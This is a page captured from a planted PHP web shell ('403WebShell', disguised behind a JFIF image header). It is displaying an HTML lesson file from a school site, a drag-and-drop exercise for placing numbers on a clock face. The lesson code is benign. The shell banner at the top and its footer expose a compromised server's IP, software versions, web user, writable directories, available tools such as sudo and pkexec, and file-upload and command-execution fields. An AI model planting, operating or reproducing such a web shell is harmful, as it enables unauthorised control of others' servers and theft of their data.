????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.148.168.26
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old6/Html/LevelC/Category2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old6/Html/LevelC/Category2/LevelCCat2Lesson07.html
<!DOCTYPE html>
<html>
    <head>
        <title>Fill the numbers in the clock</title>
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
                        
            <script>
                                
                function page_preLoad()
                {
                    shared_setDeviceTypeLevelCategoryLastLesson(Level.C, Category.No2);
                    shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                    
                    shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.C, Category.No2, 7), true, true);
                    shared_setFooterTable('id_tblFooter', true, true, false, true, true);
                    
                    var ids_headings = ['id_td_heading1'];
                    var ids_boxes = ['id_dropBox_smallCircle1', 'id_dropBox_smallCircle2', 'id_dropBox_smallCircle3', 'id_dropBox_smallCircle4', 'id_dropBox_smallCircle5', 'id_dropBox_smallCircle6', 'id_dropBox_smallCircle7', 'id_dropBox_smallCircle8', 'id_dropBox_smallCircle9', 'id_dropBox_smallCircle10', 'id_dropBox_smallCircle11', 'id_dropBox_smallCircle12'];
                    var ids_options = ['id_td_no1', 'id_td_no2', 'id_td_no3', 'id_td_no4', 'id_td_no5', 'id_td_no6', 'id_td_no7', 'id_td_no8', 'id_td_no9', 'id_td_no10', 'id_td_no11', 'id_td_no12'];
                    var ids_spans = ['id_span_no1', 'id_span_no2', 'id_span_no3', 'id_span_no4', 'id_span_no5', 'id_span_no6', 'id_span_no7', 'id_span_no8', 'id_span_no9', 'id_span_no10', 'id_span_no11', 'id_span_no12'];
                    var ids_All = ids_headings.concat(ids_boxes);
                    
                    shared_adjust_fontSize_for_ids_all_devices(ids_All, 80);
                    shared_adjust_fontSize_for_ids_all_devices(ids_options, 120);

                    shared_init_dropBox_tds_withOUT_drag_here(ids_boxes);
                    shared_init_dropping_spans(ids_spans);
                }
            
                function page_onLoad()
                {
                    loadClock('id_td1', true, 'topLeft');
                    
                    var eTbl = document.getElementById('id_tbl_inner');
                    eTbl.border = (shared_currentDeviceOS == shared_deviceOS_Android) ? '2' : '1';
                }
                
                function btnHome_click()
                {
                    shared_btnHomeCategories_click('LevelC');
                }
                
                function btnPrevious_click()
                {
                    window.location = 'LevelCCat2Lesson06.html';
                }
                
                function btnNext_click()
                {
                    window.location = 'LevelCCat2Lesson08.html';
                }
                
                function getPoint(pFromPoint, angleInDeg, distance)
                {
                    var returnPoint = new Point();
                    
                    var pi = 3.142857;
                    var angleInRad = angleInDeg * pi / 180.0;
                    
                    returnPoint.x = pFromPoint.x + distance * Math.cos(angleInRad);
                    returnPoint.y = pFromPoint.y + distance * Math.sin(angleInRad);
                    
                    return (returnPoint);
                }
                
                function loadClock(id_td, isCirclesRequired, circlesPosition)
                {
                    var eTd = document.getElementById(id_td);
                    var eTdRectangle = eTd.getBoundingClientRect();
                    
                    var widthTd = eTdRectangle.width;
                    var heightTd = eTdRectangle.height;

                    var bigCircleSquareWidthHeight = Math.min(widthTd, heightTd);
                    //bigCircleSquareWidthHeight *= 0.9;//Original
                    
                    //Newly added
                    if (shared_currentDeviceOS == shared_deviceOS_Android)
                    {
                        bigCircleSquareWidthHeight *= 0.98;
                    }
                    else
                    {
                        bigCircleSquareWidthHeight *= 0.97;
                    }
                    
                    var canvasSmallCircleToBorderGap = 2.0;
                    var bigCircleCanvasWidthOrHeightHalf = bigCircleSquareWidthHeight / 2.0;
                    var bigCircleRadius = bigCircleCanvasWidthOrHeightHalf - 5.0;
                    var smallCircleCanvasWidthHeight = (bigCircleCanvasWidthOrHeightHalf / 4.0);
                    var smallCirclesRadius = (smallCircleCanvasWidthHeight / 2.0) - canvasSmallCircleToBorderGap;
                    var nCircles = 12;
                    var angleCircleToCircle = 360.0 / nCircles;
                    
                    var eHeader = document.getElementById('id_tblHeader');

                    var centerPoint = new Point((widthTd / 2.0) + eTdRectangle.left, (heightTd / 2.0) + eTdRectangle.top);

                    var angleInDeg = -60;
                    var distance = bigCircleRadius - (smallCircleCanvasWidthHeight / 2.0);
                    
                    var idBigCircle = 'id_bigCircle';
                    var eBigCircle = document.getElementById(idBigCircle);
                    eBigCircle.width = bigCircleSquareWidthHeight;
                    eBigCircle.height = bigCircleSquareWidthHeight;
                    eBigCircle.style.left = (centerPoint.x -  bigCircleCanvasWidthOrHeightHalf)+ 'px';
                    eBigCircle.style.top = (centerPoint.y -  bigCircleCanvasWidthOrHeightHalf)+ 'px';
                    //eBigCircle.style.position = centerPoint;
                    eBigCircle.style.backgroundColor = shared_colorOlive;
                    
                    setBigCircleInfo(idBigCircle, bigCircleCanvasWidthOrHeightHalf, bigCircleCanvasWidthOrHeightHalf, bigCircleRadius);
                    
                    var number = 3;
                    
                    for (var nthCanvas = 1; nthCanvas <= nCircles; nthCanvas++)
                    {
                        var point = getPoint(centerPoint, angleInDeg, distance);
                        
                        var idCanvas = 'id_dropBox_smallCircle' + nthCanvas;
                        
                        var eSmallCircle = document.getElementById(idCanvas);
                        eSmallCircle.width = smallCircleCanvasWidthHeight;
                        eSmallCircle.height = smallCircleCanvasWidthHeight;
                        eSmallCircle.style.left = (point.x - (smallCircleCanvasWidthHeight / 2.0)) + 'px';
                        eSmallCircle.style.top = (point.y - (smallCircleCanvasWidthHeight / 2.0)) + 'px';
                        eSmallCircle.circlesRadius = smallCirclesRadius;
                        
                        setSmallCircleInfo(idCanvas, smallCirclesRadius, canvasSmallCircleToBorderGap, isCirclesRequired, number);
                        
                        if (!(isCirclesRequired))
                        {
                            number++;
                            
                            if (number > nCircles)
                            {
                                number = 1;
                            }
                        }
                        
                        angleInDeg += angleCircleToCircle;
                    }
                    
                    var dotCircleDia = smallCirclesRadius / 2.5;
                    var dotCircleRadius = dotCircleDia / 2.0;
                    
                    var idDotCircle = 'id_dotCircle';
                    var eDotCircle = document.getElementById(idDotCircle);
                    eDotCircle.width = dotCircleDia + 2;
                    eDotCircle.height = dotCircleDia + 2;
                    eDotCircle.style.left = (centerPoint.x - dotCircleRadius - 1) + 'px';
                    eDotCircle.style.top = (centerPoint.y - dotCircleRadius - 1) + 'px';
                    
                    setDotCircleInfo(idDotCircle, dotCircleRadius, dotCircleRadius, dotCircleRadius);
                }
                                
                function setBigCircleInfo(id_circle, positionX, positionY, circlesRadius)
                {
                    var eDropBoxBigCircle = document.getElementById(id_circle);
                    
                    var eDropBoxBigCircleContext = eDropBoxBigCircle.getContext("2d");
                    eDropBoxBigCircleContext.beginPath();
                    eDropBoxBigCircleContext.arc(positionX, positionY, circlesRadius, 0, 2*Math.PI);
                    eDropBoxBigCircleContext.stroke();
                    eDropBoxBigCircleContext.fillStyle = '#F2F2F2';//Light gray
                    eDropBoxBigCircleContext.fill();
                }
                
                function setSmallCircleInfo(id_circle, circlesRadius, canvasSmallCircleToBorderGap, isCirclesRequired, number)
                {
                    var eDropBoxSmallCircle = document.getElementById(id_circle);
                    
                    var eDropBoxSmallCircleContext = eDropBoxSmallCircle.getContext("2d");
                    
                    eDropBoxSmallCircleContext.beginPath();
                    
                    if (isCirclesRequired)
                    {
                        eDropBoxSmallCircleContext.arc(circlesRadius + canvasSmallCircleToBorderGap, circlesRadius + canvasSmallCircleToBorderGap, circlesRadius , 0, 2*Math.PI);
                        eDropBoxSmallCircleContext.strokeStyle = 'black';
                        eDropBoxSmallCircleContext.stroke();
                        eDropBoxSmallCircleContext.fillStyle = '#F2F2F2';//Light gray
                        eDropBoxSmallCircleContext.fill();
                    }
                    else
                    {
                        var xPosition = number < 10 ? (circlesRadius * 1.15) : circlesRadius;
                    
                        eDropBoxSmallCircleContext.font = circlesRadius + 'px Arial Rounded MT Bold';
                        eDropBoxSmallCircleContext.fillStyle = 'black';
                        eDropBoxSmallCircleContext.textAlign = 'center';
                        eDropBoxSmallCircleContext.textBaseline = 'middle';
                        eDropBoxSmallCircleContext.fillText(number, xPosition, circlesRadius);
                    }
                }
                
                function setDotCircleInfo(id_circle, positionX, positionY, circlesRadius)
                {
                    var eDropBoxDotCircle = document.getElementById(id_circle);
                    
                    var eDropBoxDotContext = eDropBoxDotCircle.getContext("2d");
                    eDropBoxDotContext.beginPath();
                    eDropBoxDotContext.arc(positionX + 1, positionY + 1, circlesRadius, 0, 2*Math.PI);
                    eDropBoxDotContext.fillStyle = 'black';
                    eDropBoxDotContext.fill();
                }
                
                function DragDrop(id_dropBox, ids_array)
                {
                    if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
                    {
                        var eCurrentDropped = document.getElementById(shared_currentDropingId);
                        
                        var eDropBoxCircle = document.getElementById(id_dropBox);
                        var circlesRadius = eDropBoxCircle.circlesRadius;
                        
                        var xPosition = eCurrentDropped.innerText.valueOf() < 10 ? (circlesRadius * 1.15) : circlesRadius;
                        
                        var eDropBoxContext = eDropBoxCircle.getContext("2d");
                        
                        eDropBoxContext.strokeStyle = 'black';
                        eDropBoxContext.stroke();
                        eDropBoxContext.fillStyle = shared_colorLightGreen;
                        eDropBoxContext.fill();
                        
                        eDropBoxContext.beginPath();
                        eDropBoxContext.font = circlesRadius + 'px Arial Rounded MT Bold';
                        eDropBoxContext.fillStyle = 'black';
                        eDropBoxContext.textAlign = 'center';
                        eDropBoxContext.textBaseline = 'middle';
                        eDropBoxContext.fillText(eCurrentDropped.innerText, xPosition, circlesRadius);
                        
                        eCurrentDropped.innerText = '';
                        eCurrentDropped.hidden = true;
                        eCurrentDropped.isMoved = true;//Newly added 0n 17-jul-2014
                        
                        isAllInfosMovedShowClapsAnimation();

                        shared_set_currentDropingId_draggbleToFalse();
                    }
                    else
                    {
                        shared_resetCurrentDroppingPosition(id_dropBox);
                    }
                }
            
                function isAllInfosMovedShowClapsAnimation()
                {
                    var ids_boxes = ['id_dropBox_smallCircle1', 'id_dropBox_smallCircle2', 'id_dropBox_smallCircle3', 'id_dropBox_smallCircle4', 'id_dropBox_smallCircle5', 'id_dropBox_smallCircle6', 'id_dropBox_smallCircle7', 'id_dropBox_smallCircle8', 'id_dropBox_smallCircle9', 'id_dropBox_smallCircle10', 'id_dropBox_smallCircle11', 'id_dropBox_smallCircle12'];
                    
                    shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes);
                }
            
        </script>
    </head>
    
    <body onload="page_onLoad()">
        <div id="shared_id_div_claps_image">
        </div>
        
        <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
            <tr height="8%">
                <td>
                    <div id="id_tblHeader"></div>
                </td>
            </tr>
            <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
                <td style="border-right: none;">
                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%">
                        <tr>
                            <td align="center">
                                <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                    <tr height="5%">
                                        <td id="id_td_heading1" class="shared_style_options_blue_24px_bold" style="border-left: none; border-right: none; border-bottom: none">
                                            <span>Fill the numbers in the clock:</span>
                                        </td>
                                    </tr>
                                    <tr height="*">
                                        <td style="border-left: none; border-right: none">
                                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                <tr height="50%">
                                                    <td width="50%" align="center" style="border-left: none; border-right: none; border-top:none">
                                                        <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
                                                            <tr height="10%">
                                                                <td style="border: none">
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                        <tr height="50%">
                                                                            <td id="id_td_no1" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_no1"  class="cls_drag_no1">1</span>
                                                                            </td>
                                                                            <td id="id_td_no2" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_no2" class="cls_drag_no2">2</span>
                                                                            </td>
                                                                            <td id="id_td_no3" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_no3" class="cls_drag_no3">3</span>
                                                                            </td>
                                                                            <td id="id_td_no4" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_no4" class="cls_drag_no4">4</span>
                                                                            </td>
                                                                            <td id="id_td_no5" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_no5" class="cls_drag_no5">5</span>
                                                                            </td>
                                                                            <td id="id_td_no6" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_no6" class="cls_drag_no6">6</span>
                                                                            </td>
                                                                            <td id="id_td_no7" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_no7" class="cls_drag_no7">7</span>
                                                                            </td>
                                                                            <td id="id_td_no8" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_no8" class="cls_drag_no8">8</span>
                                                                            </td>
                                                                            <td id="id_td_no9" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_no9" class="cls_drag_no9">9</span>
                                                                            </td>
                                                                            <td id="id_td_no10" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_no10" class="cls_drag_no10">10</span>
                                                                            </td>
                                                                            <td id="id_td_no11" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_no11" class="cls_drag_no11">11</span>
                                                                            </td>
                                                                            <td id="id_td_no12" class="shared_style_red_24px_bold" width="8%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_no12" class="cls_drag_no12">12</span>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="6%">
                                                                <td align="center" valign="bottom" style="border-left: none; border-right: none; border-bottom: none">
                                                                    <img id="id_img" src="../../../img/LevelC/Category2/LevelCCat2Lesson07/arrows.png" width="30%" draggable="false">
                                                                        </td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td id="id_td1" align="center" style="border:none">
                                                                </td>
                                                            </tr>
                                                        </table>
                                                        
                                                        <canvas id="id_bigCircle" style="position:absolute"></canvas>
                                                        <canvas id="id_dotCircle" style="position:absolute"></canvas>
                                                        
                                                        <canvas id="id_dropBox_smallCircle1"
                                                                ondragover="shared_highlight('id_dropBox_smallCircle1'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_smallCircle1')"
                                                                ondrop="DragDrop('id_dropBox_smallCircle1', ['id_span_no1'])"
                                                                style="position:absolute"></canvas>
                                                        <canvas id="id_dropBox_smallCircle2"
                                                                ondragover="shared_highlight('id_dropBox_smallCircle2'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_smallCircle2')"
                                                                ondrop="DragDrop('id_dropBox_smallCircle2', ['id_span_no2'])"
                                                                style="position:absolute"></canvas>
                                                        <canvas id="id_dropBox_smallCircle3"
                                                                ondragover="shared_highlight('id_dropBox_smallCircle3'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_smallCircle3')"
                                                                ondrop="DragDrop('id_dropBox_smallCircle3', ['id_span_no3'])"
                                                                style="position:absolute"></canvas>
                                                        <canvas id="id_dropBox_smallCircle4"
                                                                ondragover="shared_highlight('id_dropBox_smallCircle4'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_smallCircle4')"
                                                                ondrop="DragDrop('id_dropBox_smallCircle4', ['id_span_no4'])"
                                                                style="position:absolute"></canvas>
                                                        <canvas id="id_dropBox_smallCircle5"
                                                                ondragover="shared_highlight('id_dropBox_smallCircle5'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_smallCircle5')"
                                                                ondrop="DragDrop('id_dropBox_smallCircle5', ['id_span_no5'])"
                                                                style="position:absolute"></canvas>
                                                        <canvas id="id_dropBox_smallCircle6"
                                                                ondragover="shared_highlight('id_dropBox_smallCircle6'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_smallCircle6')"
                                                                ondrop="DragDrop('id_dropBox_smallCircle6', ['id_span_no6'])"
                                                                style="position:absolute"></canvas>
                                                        <canvas id="id_dropBox_smallCircle7"
                                                                ondragover="shared_highlight('id_dropBox_smallCircle7'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_smallCircle7')"
                                                                ondrop="DragDrop('id_dropBox_smallCircle7', ['id_span_no7'])"
                                                                style="position:absolute"></canvas>
                                                        <canvas id="id_dropBox_smallCircle8"
                                                                ondragover="shared_highlight('id_dropBox_smallCircle8'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_smallCircle8')"
                                                                ondrop="DragDrop('id_dropBox_smallCircle8', ['id_span_no8'])"
                                                                style="position:absolute"></canvas>
                                                        <canvas id="id_dropBox_smallCircle9"
                                                                ondragover="shared_highlight('id_dropBox_smallCircle9'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_smallCircle9')"
                                                                ondrop="DragDrop('id_dropBox_smallCircle9', ['id_span_no9'])"
                                                                style="position:absolute"></canvas>
                                                        <canvas id="id_dropBox_smallCircle10"
                                                                ondragover="shared_highlight('id_dropBox_smallCircle10'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_smallCircle10')"
                                                                ondrop="DragDrop('id_dropBox_smallCircle10', ['id_span_no10'])"
                                                                style="position:absolute"></canvas>
                                                        <canvas id="id_dropBox_smallCircle11"
                                                                ondragover="shared_highlight('id_dropBox_smallCircle11'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_smallCircle11')"
                                                                ondrop="DragDrop('id_dropBox_smallCircle11', ['id_span_no11'])"
                                                                style="position:absolute"></canvas>
                                                        <canvas id="id_dropBox_smallCircle12"
                                                                ondragover="shared_highlight('id_dropBox_smallCircle12'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_smallCircle12')"
                                                                ondrop="DragDrop('id_dropBox_smallCircle12', ['id_span_no12'])"
                                                                style="position:absolute"></canvas>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr height="8%">
                <td>
                    <div id="id_tblFooter"></div>
                </td>
            </tr>

        </table>
        
        <script>
            page_preLoad();
            
            new webkit_draggable('id_span_no1', {handle : 'id_td_no1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no2', {handle : 'id_td_no2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no3', {handle : 'id_td_no3', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no4', {handle : 'id_td_no4', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no5', {handle : 'id_td_no5', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no6', {handle : 'id_td_no6', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no7', {handle : 'id_td_no7', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no8', {handle : 'id_td_no8', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no9', {handle : 'id_td_no9', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no10', {handle : 'id_td_no10', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no11', {handle : 'id_td_no11', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no12', {handle : 'id_td_no12', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});

            webkit_drop.add('id_dropBox_smallCircle1', {onOver : function(){shared_highlight('id_dropBox_smallCircle1')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle1')}, onDrop : function(){DragDrop('id_dropBox_smallCircle1', ['id_span_no1'])}});
            webkit_drop.add('id_dropBox_smallCircle2', {onOver : function(){shared_highlight('id_dropBox_smallCircle2')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle2')}, onDrop : function(){DragDrop('id_dropBox_smallCircle2', ['id_span_no2'])}});
            webkit_drop.add('id_dropBox_smallCircle3', {onOver : function(){shared_highlight('id_dropBox_smallCircle3')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle3')}, onDrop : function(){DragDrop('id_dropBox_smallCircle3', ['id_span_no3'])}});
            webkit_drop.add('id_dropBox_smallCircle4', {onOver : function(){shared_highlight('id_dropBox_smallCircle4')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle4')}, onDrop : function(){DragDrop('id_dropBox_smallCircle4', ['id_span_no4'])}});
            webkit_drop.add('id_dropBox_smallCircle5', {onOver : function(){shared_highlight('id_dropBox_smallCircle5')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle5')}, onDrop : function(){DragDrop('id_dropBox_smallCircle5', ['id_span_no5'])}});
            webkit_drop.add('id_dropBox_smallCircle6', {onOver : function(){shared_highlight('id_dropBox_smallCircle6')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle6')}, onDrop : function(){DragDrop('id_dropBox_smallCircle6', ['id_span_no6'])}});
            webkit_drop.add('id_dropBox_smallCircle7', {onOver : function(){shared_highlight('id_dropBox_smallCircle7')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle7')}, onDrop : function(){DragDrop('id_dropBox_smallCircle7', ['id_span_no7'])}});
            webkit_drop.add('id_dropBox_smallCircle8', {onOver : function(){shared_highlight('id_dropBox_smallCircle8')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle8')}, onDrop : function(){DragDrop('id_dropBox_smallCircle8', ['id_span_no8'])}});
            webkit_drop.add('id_dropBox_smallCircle9', {onOver : function(){shared_highlight('id_dropBox_smallCircle9')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle9')}, onDrop : function(){DragDrop('id_dropBox_smallCircle9', ['id_span_no9'])}});
            webkit_drop.add('id_dropBox_smallCircle10', {onOver : function(){shared_highlight('id_dropBox_smallCircle10')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle10')}, onDrop : function(){DragDrop('id_dropBox_smallCircle10', ['id_span_no10'])}});
            webkit_drop.add('id_dropBox_smallCircle11', {onOver : function(){shared_highlight('id_dropBox_smallCircle11')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle11')}, onDrop : function(){DragDrop('id_dropBox_smallCircle11', ['id_span_no11'])}});
            webkit_drop.add('id_dropBox_smallCircle12', {onOver : function(){shared_highlight('id_dropBox_smallCircle12')}, onOut : function(){shared_un_highlight('id_dropBox_smallCircle12')}, onDrop : function(){DragDrop('id_dropBox_smallCircle12', ['id_span_no12'])}});
        </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit